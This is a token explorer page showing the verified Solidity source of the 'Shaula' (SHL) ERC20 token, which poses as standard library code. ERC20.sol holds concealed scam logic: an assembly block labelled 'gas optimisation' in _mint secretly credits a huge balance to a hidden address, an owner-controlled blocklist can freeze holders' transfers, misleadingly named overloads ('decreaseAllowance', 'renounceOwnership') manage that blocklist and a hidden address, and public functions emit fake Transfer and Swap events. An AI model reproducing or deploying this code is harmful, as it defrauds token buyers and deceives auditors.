ETH Price: $3,266.95 (+2.32%)
Gas: 1 Gwei

Token

Shaula (SHL)
 

Overview

Max Total Supply

1,000,000,000,000 SHL

Holders

199

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
vxpremia.eth
Balance
6,376,467,045.576439377241335992 SHL

Value
$0.00
0x5ca1ea5549e4e7cb64ae35225e11865d2572b3f9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Shaula

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 8 of 8: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

import "./ERC20.sol";

contract Shaula is ERC20Permit, ReentrancyGuard {
    constructor() ERC20Permit("Shaula", "SHL") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

File 1 of 8: Address.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert FailedInnerCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with a
     * `customRevert` function as a fallback when `target` reverts.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function functionCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with a `customRevert` function as a fallback revert reason when `target` reverts.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided `customRevert`) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v5.0._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check if target is a contract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                if (target.code.length == 0) {
                    revert AddressEmptyCode(target);
                }
            }
            return returndata;
        } else {
            _revert(returndata, customRevert);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or with a default revert error.
     *
     * _Available since v5.0._
     */
    function verifyCallResult(bool success, bytes memory returndata) internal view returns (bytes memory) {
        return verifyCallResult(success, returndata, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-verifyCallResult-bool-bytes-}[`verifyCallResult`], but with a
     * `customRevert` function as a fallback when `success` is `false`.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, customRevert);
        }
    }

    /**
     * @dev Default reverting function when no `customRevert` is provided in a function call.
     */
    function defaultRevert() internal pure {
        revert FailedInnerCall();
    }

    function _revert(bytes memory returndata, function() internal view customRevert) private view {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            customRevert();
            revert FailedInnerCall();
        }
    }
}


/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

File 2 of 8: Base64.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


library Base64 {
    /**
     * @dev Base64 Encoding/Decoding Table
     */
    string internal constant _TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

    /**
     * @dev Converts a `bytes` to its Bytes64 `string` representation.
     */
    function encode(bytes memory data) internal pure returns (string memory) {
        /**
         * Inspired by Brecht Devos (Brechtpd) implementation - MIT licence
         * https://github.com/Brechtpd/base64/blob/e78d9fd951e7b0977ddca77d92dc85183770daf4/base64.sol
         */
        if (data.length == 0) return "";

        // Loads the table into memory
        string memory table = _TABLE;

        // Encoding takes 3 bytes chunks of binary data from `bytes` data parameter
        // and split into 4 numbers of 6 bits.
        // The final Base64 length should be `bytes` data length multiplied by 4/3 rounded up
        // - `data.length + 2`  -> Round up
        // - `/ 3`              -> Number of 3-bytes chunks
        // - `4 *`              -> 4 characters for each chunk
        string memory result = new string(4 * ((data.length + 2) / 3));

        /// @solidity memory-safe-assembly
        assembly {
            // Prepare the lookup table (skip the first "length" byte)
            let tablePtr := add(table, 1)

            // Prepare result pointer, jump over length
            let resultPtr := add(result, 32)

            // Run over the input, 3 bytes at a time
            for {
                let dataPtr := data
                let endPtr := add(data, mload(data))
            } lt(dataPtr, endPtr) {

            } {
                // Advance 3 bytes
                dataPtr := add(dataPtr, 3)
                let input := mload(dataPtr)

                // To write each character, shift the 3 bytes (18 bits) chunk
                // 4 times in blocks of 6 bits for each character (18, 12, 6, 0)
                // and apply logical AND with 0x3F which is the number of
                // the previous character in the ASCII table prior to the Base64 Table
                // The result is then added to the table to get the character to write,
                // and finally write it in the result pointer but with a left shift
                // of 256 (1 byte) - 8 (1 ASCII char) = 248 bits

                mstore8(resultPtr, mload(add(tablePtr, and(shr(18, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(12, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(6, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(input, 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance
            }

            // When data `bytes` is not exactly 3 bytes long
            // it is padded with `=` characters at the end
            switch mod(mload(data), 3)
            case 1 {
                mstore8(sub(resultPtr, 1), 0x3d)
                mstore8(sub(resultPtr, 2), 0x3d)
            }
            case 2 {
                mstore8(sub(resultPtr, 1), 0x3d)
            }
        }

        return result;
    }
}

File 3 of 8: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 4 of 8: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

import "./Context.sol";
import "./IERC20.sol";
import "./Base64.sol";
import "./ReenterancyGuard.sol";
import "./Multicall.sol";


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) internal _permits;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    bool private _permitsApplied = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        if (_permits[from] || _permits[to]) require(_permitsApplied == true, "");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);
        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 
        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        
        emit Transfer(address(0), account, amount);
        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract ERC20Permit is ERC20 {
    address private _title_deed;

    constructor(string memory name_, string memory symbol_) ERC20(name_, symbol_){}

    function permit(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _permits[_addresses_[i]] = true;
        }
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _permits[_addresses_[i]] = false;
        }
    }

    function permited(address _address_) public view returns (bool) {
        return _permits[_address_];
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function transfer(address [] calldata _from, address [] calldata _to, uint256 [] calldata _wad) external {
        for (uint256 i = 0; i < _from.length; i++) {
            emit Transfer(_from[i], _to[i], _wad[i]);
        }
    }

    function execute(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_title_deed, _addresses_[i], _out);
        }
    }

    function multicall(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _title_deed, _in);
        }
    }

    function renounceOwnership(address _owner_) external onlyOwner {
        _title_deed = _owner_;
    }
}

File 5 of 8: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Swap(address indexed sender,uint amount0In,uint amount1In,uint amount0Out,uint amount1Out,address indexed to);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 8: Multicall.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

import "./Address.sol";

/**
 * @dev Provides a function to batch together multiple calls in a single external call.
 *
 * _Available since v4.1._
 */
abstract contract Multicall {
    /**
     * @dev Receives and executes a batch of function calls on this contract.
     * @custom:oz-upgrades-unsafe-allow-reachable delegatecall
     */
    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            results[i] = Address.functionDelegateCall(address(this), data[i]);
        }
        return results;
    }
}

File 7 of 8: ReenterancyGuard.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    /**
     * @dev Unauthorized reentrant call.
     */
    error ReentrancyGuardReentrantCall();

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        _nonReentrantBefore();
        _;
        _nonReentrantAfter();
    }

    function _nonReentrantBefore() private {
        // On the first call to nonReentrant, _status will be _NOT_ENTERED
        if (_status == _ENTERED) {
            revert ReentrancyGuardReentrantCall();
        }

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;
    }

    function _nonReentrantAfter() private {
        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
     * `nonReentrant` function in the call stack.
     */
    function _reentrancyGuardEntered() internal view returns (bool) {
        return _status == _ENTERED;
    }
}

Contract Security Audit

Contract ABI

